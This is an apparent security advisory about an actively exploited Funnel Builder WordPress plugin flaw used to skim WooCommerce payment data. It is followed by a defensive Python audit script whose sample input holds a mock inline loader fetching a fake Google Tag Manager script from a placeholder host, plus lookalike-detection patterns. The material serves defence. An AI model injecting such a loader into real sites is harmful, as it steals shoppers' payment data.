Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming
A critical Funnel Builder plugin flaw is being actively exploited to inject payment skimmers into WooCommerce checkout pages. Patch to 3.15.0.3 now.
What’s new: A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, aiming to steal payment data. The flaw affects all versions prior to 3.15.0.3 and allows unauthenticated attackers to inject arbitrary JavaScript, which can load a payment skimmer disguised as Google Tag Manager scripts. FunnelKit has released a patch to address this issue.
Who’s affected
All WordPress sites running a Funnel Builder plugin version prior to 3.15.0.3. The plugin is used in over 40,000 WooCommerce stores.
What to do
- Update the Funnel Builder plugin to version 3.15.0.3 or later.
- Review Settings > Checkout > External Scripts for unfamiliar entries and remove them.
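
One way to triage the contents of that External Scripts field, as an added example (not FunnelKit's code and not from the original advisory): it assumes the field's contents have been copied out as text. The allowlist, the function names, the sample markup and the `.example` hosts are all constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this store intentionally loads scripts from; adjust per site.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>)]+""")
GTM_NAMING = re.compile(r"gtm|googletagmanager|google-?tag", re.I)

# Constructed sample of pasted field contents; .example hosts are placeholders.
SAMPLE_FIELD = """
<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>
<script>(function(d){var s=d.createElement('script');
s.src='https://googletagmanager.analytics-cdn.example/gtm.js?id=GTM-EXAMPLE';
d.head.appendChild(s);})(document);</script>
<script src="//static.widgets.example/loader.js"></script>
"""

class ScriptUrlCollector(HTMLParser):
    """Collects script src attributes plus URLs embedded in inline code."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.urls.append(src)

    def handle_data(self, data):
        # Inline loaders build the URL in a JS string, so scan text too.
        self.urls.extend(URL_RE.findall(data))

def audit_external_scripts(field_text, allowed=ALLOWED_HOSTS):
    """Return (host, url, reason) for each script URL not on the allowlist."""
    collector = ScriptUrlCollector()
    collector.feed(field_text)
    collector.close()
    findings = []
    for url in collector.urls:
        host = (urlparse(url).hostname or "").lower()
        if not host or host in allowed:
            continue  # relative path or known-good host
        # The advisory describes skimmers posing as Google Tag Manager, so
        # GTM naming on a host that is not Google's gets its own label.
        reason = "GTM lookalike" if GTM_NAMING.search(url) else "unknown host"
        findings.append((host, url, reason))
    return findings
```

The allowlist is deliberately strict, so a legitimate third-party script will also be reported until its host is added; every finding still needs a human decision before removal.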



